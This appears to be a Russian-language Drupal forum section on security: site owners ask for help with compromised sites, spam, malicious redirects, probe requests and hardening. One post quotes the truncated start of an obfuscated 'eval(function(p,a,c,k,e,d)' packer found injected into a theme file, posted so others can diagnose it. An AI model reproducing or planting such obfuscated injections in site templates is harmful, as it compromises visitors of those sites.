Безопасность

Вопросы защиты скриптов и системного окружения, объявления о найденных уязвимостях и security-релизах Drupal.
Новости команды безопасности Drupal: drupal.org/security
См. также: bugtrack.ru, securitylab.ru.

icon:

Очередные дыры Друпала

Аватар пользователя sergeybelya

В ядре Друпала с завидным постоянством продолжают находить дыры в безопасности, обновляйтесь:
https://www.drupal.org/blog/drupal-823-and-752-released

0 Спасибо

Как определить взломали сайт или (виртуальный) сервер? Возможно ли взломав сайт на Drupal поменять права и владельца директории сайта?

Аватар пользователя VasyOK

У друга старый сайт на D6. Честно сайт не мой, был бы мой, это был бы мин D7 и хост Патруль.
Пришло письмо от Яндекса, что сайт заражен. В корне сайта обнаружился файлик links816456.php (в атаче к посту). Хотел его удалить - не получилось. Смотрю по SFTP владелец папки сайта, не тот что должен быть. Маякнули на хостинг "левого" владельца убрали.

Вопрос: как определить взломали сайт или (виртуальный) сервер?
Возможно ли взломав сайт на Drupal поменять права и владельца директории, в которую этот сайт положен?

0 Спасибо

[РЕШЕНО] Не получается обновить перевод

Аватар пользователя alex-litvinov

Тема конечно изъезжена, но правильного решения я так и не нашел.

Ошибка такого типа:

0 Спасибо

Защита от взлома. Sentry? MD5? File integrity check? Как убрать все последствия взлома?

Аватар пользователя Telefax

Ядро 7.39, views 7.x-3.11

В page.tpl.php был добавлен код (моя метрика через блоки добавляется):

0 Спасибо

Проблемы с почтой

Аватар пользователя JaguarRUS

На некоторых адресах перестали доходить письма.
Есть подозрения что от них рассылается спам. Что можно сделать?

Текст возвратного письма:

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

0 Спасибо

Перенаправление на запрещенный контент

Аватар пользователя JaguarRUS

На сайт загружен непонятный код. Есть страницы с перенаправлением на порно. Чем скаинировать сайт на зараженные файлы и как убирать плохие ссылки?
Список зараженных файлов (примерн) прикрепил. Сканировал касперким.
Помогите пожалуйста.

0 Спасибо

Вредоносный код

Аватар пользователя Olips

На мой сайт стал материться Касперский. После поиска по ФТП в папке темы, нашел не понятный кусок кода в файле template.php.
Вот код:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k

0 Спасибо

Множественные уязвимости в contib модулях Drupal 7.x

Аватар пользователя gor

Команда безопасности выпустила уведомление DRUPAL-PSA-2016-001.

Это предупреждение о том, что завтра в 16:00 по UTC времени (19:00 по Московсокму времени) будет уведомление о уязвимостях вызова PHP кода в contrib модулях.

Судя по тому, что модули, на которые намекают, установлены на 1,000 до 10,000 сайтах, модули не очень популярные.

Рекомендуем завтра по получению уведомления проверить свои сайты и если необходимо - обновится.

4 Спасибо

Что за переходы по странице wp-login.php (в журнале ошибка page not found)

Аватар пользователя allakora

В журнале вижу ошибки перехода по адресам "страница не найдена"
wp-login.ph
backend/index.php
browserconfig.xml
wp-content/themes/construct/lib/scripts/dl-skin.php
wp-content/themes/urbancity/lib/scripts/download.php

и тому подобное...
Стоил ли беспокоиться по этому поводу, это взлом или что?

0 Спасибо

Защитить админку в nginx

Аватар пользователя ieh

Добрый день.
Подскажите, как в nginx настроить, чтобы спрашивал пароль через passwd не только к URL /admin , но и /?q=admin

Спасибо.

0 Спасибо

Безопасность Drupal 6 и его будущие.

Аватар пользователя Vanekru

Добрый день. Помогите со сложным выбором. Сам программист, создал очень много сайтов на друпал. Но лет пять назад, отошел от работы по созданию сайтов и занялся своими интернет магазинами. Магазины мои на 6 версии, и на 7ку я их не хочу переводить, так как за пять лет работы огромное количество своих наработок и времени все это переделывать нет. Сайты работают отлично и 6 версия меня очень устраивает. Сейчас встал вопрос создание нового магазина и я не могу определится на какой версии его делать.

0 Спасибо

Как узнать: когда и каким пользователем был создан определённый блок?

Аватар пользователя useronforum

Как узнать: когда и каким пользователем был создан определённый блок?
Блоки находятся здесь: Главная › Управление › Структура › Блоки.

В интерфейсе Drupal 7 у материалов есть колонка, когда они обновлены.
Как аналогично узнать дату создания или последнего изменения блока
и какой пользователь его создал?

Может быть лог изменений в крайнем случае ведётся?

0 Спасибо

Хостинг уведомил о вирусе в jquery.js в сборке drupal

Аватар пользователя Isais

Пришло сообщение от хостинга, что наден вирус на сайте и находиться по адресу <корень сайта>/misc/jquery.js
Указывает, что там троян "win.trojan.agent-1430626"

Скачал указанный файл сравнил с файлом, который лежит в оригинальной сборке drupal-7.43, оказалось он полностью идентичен.

0 Спасибо

Борьба с взломом сайта

Аватар пользователя roman-yrv

Добрый день.

Вопрос не по Drupal, в по вопросам взлома сайта.

Так вот, есть один проект, реализованный на старом движке (не Drupal). И туда периодически записываются вредоносные скрипты, предназначенные, как я понимаю, для спама или еще чего. Они имеют названия типа blog.php, gallery.php и т.д. Проект хостится на VPS c CentOS.

Хочу задать несколько вопросов специалистам по администрированию.

0 Спасибо

Бот зашел в свой ЛК минуя ссылку, высланная ему на почту

Аватар пользователя chudomedved

Всем привет,
на сайте настроена система регистрации: имя+емаил+капча я не робот+honeypot, затем приходит ссылка на указанный емаил о входе в ЛК и установления пароля(вобщем стандартная классика). Но бот все равно зарегился левым емаилом вида vfgbhnkgkr@njkbblk.com, а после еще и зашел в свой ЛК. Вопрос: каким образом "он" это смог сделать? Что смотреть?

0 Спасибо

Подозрительные действия пользователя

Аватар пользователя Sven

собственно говоря такая ситуация. выгрузил сайт, о котором знает только напарник и я(в поисковиках не имеется), вчера появился пользователь и до сих пор выполняет следующие действия
http://prnt.sc/b4bqit

Вопрос: чем это опасно, что он пытается сделать и как он мог придти, можно ли доверять напарнику, скажем так, ну и как с этим бороться?

при удалении пользователя друпал предлагает также удалить его материалы. о каких материалах идет речь, без понятия, в содержимом ничего и типа материала review не существует.

0 Спасибо

Что если залить ядро Drupal поверх сайта ?

Аватар пользователя kuzmit4

Сайт сожрали вирусы, и появилось пару вопросов.
1) Можно ли архив drupal-7.30 залить поверх сайта Drupal 7.30, Нечего не слетит, и какие могут быть последствия ?
2) Можно ли архив drupal-7.43 залить поверх сайта Drupal 7.30, и что будет, или обновлять можно только через админку ?

Т.е. задача избавиться от вредоносного кода путем перезаписи поверх ядра сайта.
Просто ответьте на выше поставленные вопросы, и все. Можно нельзя, какие могут быть последствия, и на что нужно обратить внимание.

0 Спасибо

Сайт вдруг начал "ЖРАТЬ" оперативку хоста под завязку .....

Аватар пользователя chudomedved

Всем привет!
Жил был сайт, чисто для себя, для экспериментов. Без посещаемости, ну кроме пиратских ботов. База данных совсем малышка около 20мб, всякий хлам. Роботс тхт на запрете индексации поисковиками. Еще неделю назад потреблял около 20мб оперативки. Ну что с этого сайта взять казалось бы??!

0 Спасибо

Сайт кондиционеров - оплата товаров через сайт на DRUPAL 6

Аватар пользователя pws

Здравствуйте уважаемые коллеги. Имею сайт кондиционеры интернет-магазин на drupal 6, основной спектр услуг компании установка кондиционеров, и я хочу привязать оплату товаров и услуг через интернет к старенькому ubercart, но вот какие сомнения.

0 Спасибо

Как найти на Drupal-сайте вредоносный скрипт?

Аватар пользователя Mindzor

Здравствуйте!

Хостер недавно отключил один из моих заброшенных сайтов на Drupal 6 по причине того что там якобы обнаружился вредоносный скрипт. На вопрос где именно расположен вредонос, хостер сказал, что не знает, т.к. не ведет логов.

Насколько я знаю взломы обычно проходят через так сказать bad input. Я отключил на сайте все комментарии и всё такое. Т.е. сайт чисто для просмотра. И все равно его как-то похекали.

0 Спасибо